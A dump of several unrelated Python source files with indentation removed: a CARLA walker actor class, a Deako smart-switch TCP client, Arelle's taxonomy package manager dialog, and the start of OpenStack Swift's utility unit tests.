:param carla_actor: carla walker actor object
:type carla_actor: carla.Walker
:param parent: the parent of this
:type parent: carla_icv_bridge.Parent
:param communication: communication-handle
:type communication: carla_icv_bridge.communication
:param prefix: the topic prefix to be used for this actor
:type prefix: string
"""
if not prefix:
prefix = "walker/{:03}".format(carla_actor.id)
super(Walker, self).__init__(carla_actor=carla_actor,
parent=parent,
communication=communication,
prefix=prefix)
self.control_subscriber = CarlaWalkerControl()
self.sub1=Subscriber(self.get_topic_prefix() + "/walker_control_cmd")
self.Sec_loop=0.02
self.update_command_thread = Thread(target=self._update_commands_thread)
self.update_command_thread.start()
def update(self, frame, timestamp):
super(Walker, self).update(frame, timestamp)
def control_command_updated(self):
"""
Receive a CarlaWalkerControl msg and send to CARLA
This function gets called whenever a icv message is received via
'/carla/<role name>/walker_control_cmd' topic.
The received icv message is converted into carla.WalkerControl command and
sent to CARLA.
:param icv_walker_control: current walker control input received via icv
:type self.info.output: carla_icv_bridge.msg.CarlaWalkerControl
:return:
"""
self.sub1.subscribe( self.control_subscriber)
walker_control = WalkerControl()
walker_control.direction.x = self.control_subscriber.direction.x
walker_control.direction.y = -self.control_subscriber.direction.y
walker_control.direction.z = self.control_subscriber.direction.z
walker_control.speed = self.control_subscriber.speed
walker_control.jump = self.control_subscriber.jump
self.carla_actor.apply_control(walker_control)
def _update_commands_thread (self):
if self.sub1.getstate():
self.sub1.reset()
self.control_command_updated()
def get_classification(self):
"""
Function (override) to get classification
:return:
"""
return Object.CLASSIFICATION_PEDESTRIAN
|
deako.py | from threading import Timer
import socket
import select
import threading
import json
import asyncio
device_list_dict = {
"transactionId": "015c44d3-abec-4be0-bb0d-34adb4b81559",
"type": "DEVICE_LIST",
"dst": "deako",
"src": "ACME Corp"
}
state_change_dict = {
"transactionId": "015c44d3-abec-4be0-bb0d-34adb4b81559",
"type": "CONTROL",
"dst": "deako",
"src": "ACME Corp",
}
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
def _run(self):
self.is_running = False
self.start()
self.function(*self.args)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
if self.is_running:
self._timer.cancel()
self.is_running = False
class Deako:
def __init__(self, ip, what):
self.ip = ip
self.src = what
self.s = None
self.devices = {}
self.expected_devices = 0
self.rt = RepeatedTimer(2, self._internal_connect, self)
def update_state(self, uuid, power, dim=None):
if uuid is None:
return
if uuid not in self.devices:
return
self.devices[uuid]["state"]["power"] = power
self.devices[uuid]["state"]["dim"] = dim
if "callback" not in self.devices[uuid]:
return
self.devices[uuid]["callback"]()
def set_state_callback(self, uuid, callback):
if uuid not in self.devices:
return
self.devices[uuid]["callback"] = callback
def record_device(self, name, uuid, power, dim=None):
if uuid is None:
return
if uuid not in self.devices:
self.devices[uuid] = {}
self.devices[uuid]["state"] = {}
self.devices[uuid]["name"] = name
self.devices[uuid]["uuid"] = uuid
self.devices[uuid]["state"]["power"] = power
self.devices[uuid]["state"]["dim"] = dim
def incoming_json(self, in_data):
if in_data["type"] == "DEVICE_LIST":
subdata = in_data["data"]
self.expected_devices = subdata["number_of_devices"]
elif in_data["type"] == "DEVICE_FOUND":
subdata = in_data["data"]
state = subdata["state"]
if "dim" in state:
self.record_device(
subdata["name"], subdata["uuid"], state["power"], state["dim"])
else:
self.record_device(
subdata["name"], subdata["uuid"], state["power"])
elif in_data["type"] == "EVENT":
subdata = in_data["data"]
state = subdata["state"]
if "dim" in state:
self.update_state(subdata["target"],
state["power"], state["dim"])
else:
self.update_state(subdata["target"], state["power"])
else:
print(json.dumps(in_data))
def read_func(self, s):
leftovers = ""
while 1:
socket_list = [s]
# Get the list sockets which are readable
read_sockets, write_sockets, error_sockets = select.select(
socket_list, [], [])
for sock in read_sockets:
# incoming message from remote server
if sock == s:
try:
data = sock.recv(1024)
if not data:
self.rt.start()
return
else:
raw_string = data.decode("utf-8")
list_of_items = raw_string.split("\r\n")
for item in list_of_items:
if len(item) == 0:
continue
try:
self.incoming_json(
json.loads(item))
continue
except json.decoder.JSONDecodeError:
leftovers = leftovers + item
if len(leftovers) != 0:
try:
self.incoming_json(
json.loads(leftovers))
leftovers = ""
except json.decoder.JSONDecodeError:
self.errors = 0
except:
self.rt.start()
return
def _internal_connect(self, this):
this.rt.stop()
try:
this.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
this.s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
this.s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)
this.s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 3)
this.s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 3)
this.s.settimeout(2)
this.s.connect((this.ip, 23))
x = threading.Thread(target=this.read_func, args=(this.s,))
x.start()
except:
this.rt.start()
def connect(self):
self._internal_connect(self)
def send_data(self, data_to_send):
if self.s is None:
return
try:
self.s.send(str.encode(data_to_send))
except:
self.s.close()
self.rt.start()
def get_devices(self):
return self.devices
async def find_devices(self, timeout = 10):
device_list_dict["src"] = self.src
self.send_data(json.dumps(device_list_dict))
remaining = timeout
while(self.expected_devices == 0 or len(self.devices) != self.expected_devices and remaining > 0):
await asyncio.sleep(1)
remaining -= 1
def send_device_control(self, uuid, power, dim=None):
state_change = {
"target": uuid,
"state": {
"power": power,
"dim": dim
}
}
state_change_dict["data"] = state_change
state_change_dict["src"] = self.src
self.send_data(json.dumps(state_change_dict))
def get_name_for_device(self, uuid):
return self.devices[uuid]["name"]
def get_state_for_device(self, uuid):
return self.devices[uuid]["state"]
|
DialogPackageManager.py | '''
Created on Oct 6, 2013 (from DialogPluginManager.py)
@author: Mark V Systems Limited
(c) Copyright 2013 Mark V Systems Limited, All rights reserved.
'''
from tkinter import simpledialog, Toplevel, font, messagebox, VERTICAL, HORIZONTAL, N, S, E, W
from tkinter.constants import DISABLED, ACTIVE
try:
from tkinter.ttk import Treeview, Scrollbar, Frame, Label, Button
except ImportError:
from ttk import Treeview, Scrollbar, Frame, Label, Button
from arelle import PackageManager, DialogURL
from arelle.CntlrWinTooltip import ToolTip
import os, time
try:
import regex as re
except ImportError:
import re
def dialogPackageManager(mainWin):
# check for updates in background
import threading
thread = threading.Thread(target=lambda cntlr=mainWin: backgroundCheckForUpdates(cntlr))
thread.daemon = True
thread.start()
def backgroundCheckForUpdates(cntlr):
cntlr.showStatus(_("Checking for updates to packages")) # clear web loading status
packageNamesWithNewerFileDates = PackageManager.packageNamesWithNewerFileDates()
if packageNamesWithNewerFileDates:
cntlr.showStatus(_("Updates are available for these packages: {0}")
.format(', '.join(packageNamesWithNewerFileDates)), clearAfter=5000)
else:
cntlr.showStatus(_("No updates found for packages."), clearAfter=5000)
time.sleep(0.1) # Mac locks up without this, may be needed for empty ui queue?
cntlr.uiThreadQueue.put((DialogPackageManager, [cntlr, packageNamesWithNewerFileDates]))
class DialogPackageManager(Toplevel):
def __init__(self, mainWin, packageNamesWithNewerFileDates):
super(DialogPackageManager, self).__init__(mainWin.parent)
self.ENABLE = _("Enable")
self.DISABLE = _("Disable")
self.parent = mainWin.parent
self.cntlr = mainWin
# copy plugins for temporary display
self.packagesConfig = PackageManager.packagesConfig
self.packagesConfigChanged = False
self.packageNamesWithNewerFileDates = packageNamesWithNewerFileDates
parentGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", self.parent.geometry())
dialogX = int(parentGeometry.group(3))
dialogY = int(parentGeometry.group(4))
self.title(_("Taxonomy Packages Manager"))
frame = Frame(self)
# left button frame
buttonFrame = Frame(frame, width=40)
buttonFrame.columnconfigure(0, weight=1)
addLabel = Label(buttonFrame, text=_("Find taxonomy packages:"), wraplength=64, justify="center")
addLocalButton = Button(buttonFrame, text=_("Locally"), command=self.findLocally)
ToolTip(addLocalButton, text=_("File chooser allows selecting taxonomy packages to add (or reload), from the local file system. "
"Select either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
addWebButton = Button(buttonFrame, text=_("On Web"), command=self.findOnWeb)
ToolTip(addWebButton, text=_("Dialog to enter URL full path to load (or reload) package, from the web or local file system. "
"URL may be either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
manifestNameButton = Button(buttonFrame, text=_("Manifest"), command=self.manifestName)
ToolTip(manifestNameButton, text=_("Provide pre-PWD non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). "
"Uses unix file name pattern matching. "
"Multiple manifest files are supported in pre-PWD archives (such as oasis catalogs). "
"(Replaces pre-PWD search for either .taxonomyPackage.xml or catalog.xml). "), wraplength=480)
self.manifestNamePattern = ""
addLabel.grid(row=0, column=0, pady=4)
addLocalButton.grid(row=1, column=0, pady=4)
addWebButton.grid(row=2, column=0, pady=4)
manifestNameButton.grid(row=3, column=0, pady=4)
buttonFrame.grid(row=0, column=0, rowspan=3, sticky=(N, S, W), padx=3, pady=3)
# right tree frame (packages already known to arelle)
packagesFrame = Frame(frame, width=700)
vScrollbar = Scrollbar(packagesFrame, orient=VERTICAL)
hScrollbar = Scrollbar(packagesFrame, orient=HORIZONTAL)
self.packagesView = Treeview(packagesFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=7)
self.packagesView.grid(row=0, column=0, sticky=(N, S, E, W))
self.packagesView.bind('<<TreeviewSelect>>', self.packageSelect)
hScrollbar["command"] = self.packagesView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.packagesView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
packagesFrame.columnconfigure(0, weight=1)
packagesFrame.rowconfigure(0, weight=1)
packagesFrame.grid(row=0, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.packagesView.focus_set()
self.packagesView.column("#0", width=120, anchor="w")
self.packagesView.heading("#0", text=_("Name"))
self.packagesView["columns"] = ("ver", "status", "date", "update", "descr")
self.packagesView.column("ver", width=150, anchor="w", stretch=False)
self.packagesView.heading("ver", text=_("Version"))
self.packagesView.column("status", width=50, anchor="w", stretch=False)
self.packagesView.heading("status", text=_("Status"))
self.packagesView.column("date", width=170, anchor="w", stretch=False)
self.packagesView.heading("date", text=_("File Date"))
self.packagesView.column("update", width=50, anchor="w", stretch=False)
self.packagesView.heading("update", text=_("Update"))
self.packagesView.column("descr", width=200, anchor="w", stretch=False)
self.packagesView.heading("descr", text=_("Description"))
remappingsFrame = Frame(frame)
vScrollbar = Scrollbar(remappingsFrame, orient=VERTICAL)
hScrollbar = Scrollbar(remappingsFrame, orient=HORIZONTAL)
self.remappingsView = Treeview(remappingsFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=5)
self.remappingsView.grid(row=0, column=0, sticky=(N, S, E, W))
hScrollbar["command"] = self.remappingsView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.remappingsView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
remappingsFrame.columnconfigure(0, weight=1)
remappingsFrame.rowconfigure(0, weight=1)
remappingsFrame.grid(row=1, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.remappingsView.focus_set()
self.remappingsView.column("#0", width=200, anchor="w")
self.remappingsView.heading("#0", text=_("Prefix"))
self.remappingsView["columns"] = ("remapping")
self.remappingsView.column("remapping", width=500, anchor="w", stretch=False)
self.remappingsView.heading("remapping", text=_("Remapping"))
# bottom frame package info details
packageInfoFrame = Frame(frame, width=700)
packageInfoFrame.columnconfigure(1, weight=1)
self.packageNameLabel = Label(packageInfoFrame, wraplength=600, justify="left",
font=font.Font(family='Helvetica', size=12, weight='bold'))
self.packageNameLabel.grid(row=0, column=0, columnspan=6, sticky=W)
self.packageVersionHdr = Label(packageInfoFrame, text=_("version:"), state=DISABLED)
self.packageVersionHdr.grid(row=1, column=0, sticky=W)
self.packageVersionLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageVersionLabel.grid(row=1, column=1, columnspan=5, sticky=W)
self.packageDescrHdr = Label(packageInfoFrame, text=_("description:"), state=DISABLED)
self.packageDescrHdr.grid(row=2, column=0, sticky=W)
self.packageDescrLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDescrLabel.grid(row=2, column=1, columnspan=5, sticky=W)
self.packagePrefixesHdr = Label(packageInfoFrame, text=_("prefixes:"), state=DISABLED)
self.packagePrefixesHdr.grid(row=3, column=0, sticky=W)
self.packagePrefixesLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packagePrefixesLabel.grid(row=3, column=1, columnspan=5, sticky=W)
ToolTip(self.packagePrefixesLabel, text=_("List of prefixes that this package remaps."), wraplength=240)
self.packageUrlHdr = Label(packageInfoFrame, text=_("URL:"), state=DISABLED)
self.packageUrlHdr.grid(row=4, column=0, sticky=W)
self.packageUrlLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageUrlLabel.grid(row=4, column=1, columnspan=5, sticky=W)
ToolTip(self.packageUrlLabel, text=_("URL of taxonomy package (local file path or web loaded file)."), wraplength=240)
self.packageDateHdr = Label(packageInfoFrame, text=_("date:"), state=DISABLED)
self.packageDateHdr.grid(row=5, column=0, sticky=W)
self.packageDateLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDateLabel.grid(row=5, column=1, columnspan=5, sticky=W)
ToolTip(self.packageDateLabel, text=_("Date of currently loaded package file (with parenthetical node when an update is available)."), wraplength=240)
self.packageEnableButton = Button(packageInfoFrame, text=self.ENABLE, state=DISABLED, command=self.packageEnable)
ToolTip(self.packageEnableButton, text=_("Enable/disable package."), wraplength=240)
self.packageEnableButton.grid(row=6, column=1, sticky=E)
self.packageMoveUpButton = Button(packageInfoFrame, text=_("Move Up"), state=DISABLED, command=self.packageMoveUp)
ToolTip(self.packageMoveUpButton, text=_("Move package up (above other remappings)."), wraplength=240)
self.packageMoveUpButton.grid(row=6, column=2, sticky=E)
self.packageMoveDownButton = Button(packageInfoFrame, text=_("Move Down"), state=DISABLED, command=self.packageMoveDown)
ToolTip(self.packageMoveDownButton, text=_("Move package down (below other remappings)."), wraplength=240)
self.packageMoveDownButton.grid(row=6, column=3, sticky=E)
self.packageReloadButton = Button(packageInfoFrame, text=_("Reload"), state=DISABLED, command=self.packageReload)
ToolTip(self.packageReloadButton, text=_("Reload/update package."), wraplength=240)
self.packageReloadButton.grid(row=6, column=4, sticky=E)
self.packageRemoveButton = Button(packageInfoFrame, text=_("Remove"), state=DISABLED, command=self.packageRemove)
ToolTip(self.packageRemoveButton, text=_("Remove package from packages table (does not erase the package file)."), wraplength=240)
self.packageRemoveButton.grid(row=6, column=5, sticky=E)
packageInfoFrame.grid(row=2, column=0, columnspan=5, sticky=(N, S, E, W), padx=3, pady=3)
packageInfoFrame.config(borderwidth=4, relief="groove")
okButton = Button(frame, text=_("Close"), command=self.ok)
ToolTip(okButton, text=_("Accept and changes (if any) and close dialog."), wraplength=240)
cancelButton = Button(frame, text=_("Cancel"), command=self.close)
ToolTip(cancelButton, text=_("Cancel changes (if any) and close dialog."), wraplength=240)
okButton.grid(row=3, column=3, sticky=(S,E), pady=3)
cancelButton.grid(row=3, column=4, sticky=(S,E), pady=3, padx=3)
enableDisableFrame = Frame(frame)
enableDisableFrame.grid(row=3, column=1, sticky=(S,W), pady=3)
enableAllButton = Button(enableDisableFrame, text=_("Enable All"), command=self.enableAll)
ToolTip(enableAllButton, text=_("Enable all packages."), wraplength=240)
disableAllButton = Button(enableDisableFrame, text=_("Disable All"), command=self.disableAll)
ToolTip(disableAllButton, text=_("Disable all packages."), wraplength=240)
enableAllButton.grid(row=1, column=1)
disableAllButton.grid(row=1, column=2)
self.loadTreeViews()
self.geometry("+{0}+{1}".format(dialogX+50,dialogY+100))
frame.grid(row=0, column=0, sticky=(N,S,E,W))
frame.columnconfigure(0, weight=0)
frame.columnconfigure(1, weight=1)
frame.rowconfigure(0, weight=1)
window = self.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.close)
self.protocol("WM_DELETE_WINDOW", self.close)
self.grab_set()
self.wait_window(self)
def loadTreeViews(self):
self.selectedModule = None
# clear previous treeview entries
for previousNode in self.packagesView.get_children(""):
self.packagesView.delete(previousNode)
for i, packageInfo in enumerate(self.packagesConfig.get("packages", [])):
name = packageInfo.get("name", "package{}".format(i))
node = self.packagesView.insert("", "end", "_{}".format(i), text=name)
self.packagesView.set(node, "ver", packageInfo.get("version"))
self.packagesView.set(node, "status", packageInfo.get("status"))
self.packagesView.set(node, "date", packageInfo.get("fileDate"))
if name in self.packageNamesWithNewerFileDates:
self.packagesView.set(node, "update", _("available"))
self.packagesView.set(node, "descr", packageInfo.get("description"))
# clear previous treeview entries
for previousNode in self.remappingsView.get_children(""):
self.remappingsView.delete(previousNode)
for i, remappingItem in enumerate(sorted(self.packagesConfig.get("remappings", {}).items())):
prefix, remapping = remappingItem
node = self.remappingsView.insert("", "end", prefix, text=prefix)
self.remappingsView.set(node, "remapping", remapping)
self.packageSelect() # clear out prior selection
def ok(self, event=None):
if self.packagesConfigChanged:
PackageManager.packagesConfig = self.packagesConfig
PackageManager.packagesConfigChanged = True
self.cntlr.onPackageEnablementChanged()
self.close()
def close(self, event=None):
self.parent.focus_set()
self.destroy()
def packageSelect(self, *args):
node = (self.packagesView.selection() or (None,))[0]
try:
nodeIndex = int(node[1:])
except (ValueError, TypeError):
nodeIndex = -1
if 0 <= nodeIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][nodeIndex]
self.selectedPackageIndex = nodeIndex
name = packageInfo["name"]
self.packageNameLabel.config(text=name)
self.packageVersionHdr.config(state=ACTIVE)
self.packageVersionLabel.config(text=packageInfo["version"])
self.packageDescrHdr.config(state=ACTIVE)
self.packageDescrLabel.config(text=packageInfo["description"])
self.packagePrefixesHdr.config(state=ACTIVE)
self.packagePrefixesLabel.config(text=', '.join(packageInfo["remappings"].keys()))
self.packageUrlHdr.config(state=ACTIVE)
self.packageUrlLabel.config(text=packageInfo["URL"])
self.packageDateHdr.config(state=ACTIVE)
self.packageDateLabel.config(text=packageInfo["fileDate"] + " " +
(_("(an update is available)") if name in self.packageNamesWithNewerFileDates else ""))
self.packageEnableButton.config(state=ACTIVE,
text={"enabled":self.DISABLE,
"disabled":self.ENABLE}[packageInfo["status"]])
self.packageMoveUpButton.config(state=ACTIVE if 0 < nodeIndex else DISABLED)
self.packageMoveDownButton.config(state=ACTIVE if nodeIndex < (len(self.packagesConfig["packages"]) - 1) else DISABLED)
self.packageReloadButton.config(state=ACTIVE)
self.packageRemoveButton.config(state=ACTIVE)
else:
self.selectedPackageIndex = -1
self.packageNameLabel.config(text="")
self.packageVersionHdr.config(state=DISABLED)
self.packageVersionLabel.config(text="")
self.packageDescrHdr.config(state=DISABLED)
self.packageDescrLabel.config(text="")
self.packagePrefixesHdr.config(state=DISABLED)
self.packagePrefixesLabel.config(text="")
self.packageUrlHdr.config(state=DISABLED)
self.packageUrlLabel.config(text="")
self.packageDateHdr.config(state=DISABLED)
self.packageDateLabel.config(text="")
self.packageEnableButton.config(state=DISABLED, text=self.ENABLE)
self.packageMoveUpButton.config(state=DISABLED)
self.packageMoveDownButton.config(state=DISABLED)
self.packageReloadButton.config(state=DISABLED)
self.packageRemoveButton.config(state=DISABLED)
def findLocally(self):
initialdir = self.cntlr.pluginDir # default plugin directory
if not self.cntlr.isMac: # can't navigate within app easily, always start in default directory
initialdir = self.cntlr.config.setdefault("packageOpenDir", initialdir)
filename = self.cntlr.uiFileDialog("open",
parent=self,
title=_("Choose taxonomy package file"),
initialdir=initialdir,
filetypes=[(_("Taxonomy package files (*.zip)"), "*.zip"),
(_("PWD Manifest (taxonomyPackage.xml)"), "taxonomyPackage.xml"),
(_("pre-PWD Manifest (*.taxonomyPackage.xml)"), "*.taxonomyPackage.xml"),
(_("pre-PWD Oasis Catalog (*catalog.xml)"), "*catalog.xml")],
defaultextension=".zip")
if filename:
# check if a package is selected (any file in a directory containing an __init__.py
self.cntlr.config["packageOpenDir"] = os.path.dirname(filename)
packageInfo = PackageManager.packageInfo(self.cntlr, filename, packageManifestName=self.manifestNamePattern)
self.loadFoundPackageInfo(packageInfo, filename)
def findOnWeb(self):
url = DialogURL.askURL(self)
if url: # url is the in-cache or local file
packageInfo = PackageManager.packageInfo(self.cntlr, url, packageManifestName=self.manifestNamePattern)
self.cntlr.showStatus("") # clear web loading status
self.loadFoundPackageInfo(packageInfo, url)
def manifestName(self):
self.manifestNamePattern = simpledialog.askstring(_("Archive manifest file name pattern"),
_("Provide non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \n"
"Uses unix file name pattern matching. \n"
"Multiple manifest files are supported in archive (such as oasis catalogs). \n"
"(If blank, search for either .taxonomyPackage.xml or catalog.xml). "),
initialvalue=self.manifestNamePattern,
parent=self)
def loadFoundPackageInfo(self, packageInfo, url):
if packageInfo and packageInfo.get("name"):
self.addPackageInfo(packageInfo)
self.loadTreeViews()
else:
messagebox.showwarning(_("Package is not itself a taxonomy package. "),
_("File does not itself contain a manifest file: \n\n{0}\n\n "
"If opening an archive file, the manifest file search pattern currently is \"\", please press \"Manifest\" to change manifest file name pattern, e.g.,, \"*.taxonomyPackage.xml\", if needed. ")
.format(url),
parent=self)
def removePackageInfo(self, name, version):
# find package entry
packagesList = self.packagesConfig["packages"]
j = -1
for i, packageInfo in enumerate(packagesList):
if packageInfo['name'] == name and packageInfo['version'] == version:
j = i
break
if 0 <= j < len(packagesList):
del self.packagesConfig["packages"][i]
self.packagesConfigChanged = True
def addPackageInfo(self, packageInfo):
name = packageInfo["name"]
version = packageInfo["version"]
self.removePackageInfo(name, version) # remove any prior entry for this package
self.packageNamesWithNewerFileDates.discard(name) # no longer has an update available
self.packagesConfig["packages"].append(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.packagesConfigChanged = True
def packageEnable(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
if self.packageEnableButton['text'] == self.ENABLE:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
elif self.packageEnableButton['text'] == self.DISABLE:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveUp(self):
if 1 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex -1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveDown(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]) - 1:
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex + 1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageReload(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
url = packageInfo.get("URL")
if url:
packageInfo = PackageManager.packageInfo(self.cntlr, url, reload=True, packageManifestName=packageInfo.get("manifestName"))
if packageInfo:
self.addPackageInfo(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
self.cntlr.showStatus(_("{0} reloaded").format(packageInfo.get("name")), clearAfter=5000)
else:
messagebox.showwarning(_("Package error"),
_("File or package cannot be reloaded: \n\n{0}")
.format(url),
parent=self)
def packageRemove(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
self.removePackageInfo(packageInfo["name"], packageInfo["version"])
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def enableAll(self):
self.enableDisableAll(True)
def disableAll(self):
self.enableDisableAll(False)
def enableDisableAll(self, doEnable):
for iPkg in range(len(self.packagesConfig["packages"])):
packageInfo = self.packagesConfig["packages"][iPkg]
if doEnable:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
else:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
|
test_utils.py | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import print_function
from test.unit import temptree
import ctypes
import errno
import eventlet
import eventlet.event
import functools
import grp
import logging
import os
import mock
import random
import re
import socket
import stat
import sys
import json
import math
from six import BytesIO, StringIO
from six.moves.queue import Queue, Empty
from six.moves import range
from textwrap import dedent
import tempfile
import time
import traceback
import unittest
import fcntl
import shutil
from getpass import getuser
from shutil import rmtree
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from six.moves.configparser import NoSectionError, NoOptionError
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout,
ReplicationLockTimeout,
MimeInvalid, ThreadPoolDead)
from swift.common import utils
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.swob import Request, Response, HeaderKeyDict
from test.unit import FakeLogger
threading = eventlet.patcher.original('threading')
class MockOs(object):
def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None):
if pass_funcs is None:
pass_funcs = []
if called_funcs is None:
called_funcs = []
if raise_funcs is None:
raise_funcs = []
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket(object):
def __init__(self, sendto_errno=None):
self.sent = []
self.sendto_errno = sendto_errno
def sendto(self, data, target):
if self.sendto_errno:
raise socket.error(self.sendto_errno,
'test errno %s' % self.sendto_errno)
self.sent.append((data, target))
def close(self):
pass
class MockSys(object):
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
@property
def version_info(self):
return sys.version_info
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
# Reset the LogAdapter class thread local state. Use get_logger() here
# to fetch a LogAdapter instance because the items from
# get_logger.handler4logger above are the underlying logger instances,
# not the LogAdapter.
utils.get_logger(None).thread_locals = (None, None)
def reset_logger_state(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
reset_loggers()
try:
return f(self, *args, **kwargs)
finally:
reset_loggers()
return wrapper
class TestTimestamp(unittest.TestCase):
"""Tests for swift.common.utils.Timestamp"""
def test_invalid_input(self):
self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1)
def test_invalid_string_conversion(self):
t = utils.Timestamp(time.time())
self.assertRaises(TypeError, str, t)
def test_offset_limit(self):
t = 1417462430.78693
# can't have a offset above MAX_OFFSET
self.assertRaises(ValueError, utils.Timestamp, t,
offset=utils.MAX_OFFSET + 1)
# exactly max offset is fine
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET)
self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff')
# but you can't offset it further
self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1)
# unless you start below it
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1)
self.assertEqual(utils.Timestamp(ts.internal, offset=1),
'1417462430.78693_ffffffffffffffff')
def test_normal_format_no_offset(self):
expected = '1402436408.91203'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.912029,
1402436408.9120300000000000,
1402436408.91202999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.912029, offset=0),
